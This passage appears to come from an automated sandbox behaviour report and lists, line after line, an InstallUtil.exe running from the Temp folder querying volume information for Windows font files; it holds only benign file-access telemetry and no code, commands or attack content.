            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
